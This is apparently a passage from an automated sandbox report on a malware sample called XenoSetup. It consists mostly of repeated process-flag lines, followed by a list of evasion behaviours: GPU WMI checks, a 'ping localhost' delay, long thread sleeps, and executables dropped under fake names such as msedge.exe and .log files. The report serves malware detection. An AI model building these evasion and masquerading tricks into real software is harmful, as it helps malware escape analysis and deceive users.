                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\XenoSetup(1).exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeMemory allocated: 1590000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeMemory allocated: 1B110000 memory reserve | memory write watchJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMemory allocated: 14B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMemory allocated: 1B240000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeMemory allocated: 1340000 memory reserve | memory write watch
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeMemory allocated: 1AF80000 memory reserve | memory write watch
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeMemory allocated: 12E0000 memory reserve | memory write watch
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeMemory allocated: 1ADC0000 memory reserve | memory write watch
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMemory allocated: 930000 memory reserve | memory write watch
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMemory allocated: 1A3E0000 memory reserve | memory write watch
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMemory allocated: D40000 memory reserve | memory write watch
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMemory allocated: 1A940000 memory reserve | memory write watch
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMemory allocated: 27B0000 memory reserve | memory write watch
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMemory allocated: 1A9C0000 memory reserve | memory write watch
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMemory allocated: 12A0000 memory reserve | memory write watch
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMemory allocated: 1B010000 memory reserve | memory write watch
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeMemory allocated: 950000 memory reserve | memory write watch
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeMemory allocated: 1A4D0000 memory reserve | memory write watch
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMemory allocated: 27D0000 memory reserve | memory write watch
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeMemory allocated: 1AA30000 memory reserve | memory write watch
                      Source: C:\Users\user\Desktop\XenoSetup(2).exe.bin.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeThread delayed: delay time: 922337203685477
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeThread delayed: delay time: 922337203685477
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeThread delayed: delay time: 922337203685477
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeThread delayed: delay time: 922337203685477
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeThread delayed: delay time: 922337203685477
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5551Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4174Jump to behavior
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\jCRLjesV.logJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\ogLKbooN.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\tBjJkMRH.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\KZGGSUqY.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\BFVQSOun.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\UWIwmTED.logJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\dQveIBvX.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\gQJUAkON.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\BOtQCANk.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\NoWOUMSl.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\FSpHSmDL.logJump to dropped file
                      Source: C:\portBrokerDll\DriverbrokerCrtDhcp.exeDropped PE file which has not been started: C:\Users\user\Desktop\RPLnQAKH.logJump to dropped file
                      Source: C:\Windows\System32Local\NZdXlPbVdUubKXQ.exeDropped PE file which has not been started: C:\Users\user\Desktop\eDXMSiYF.logJump to dropped file
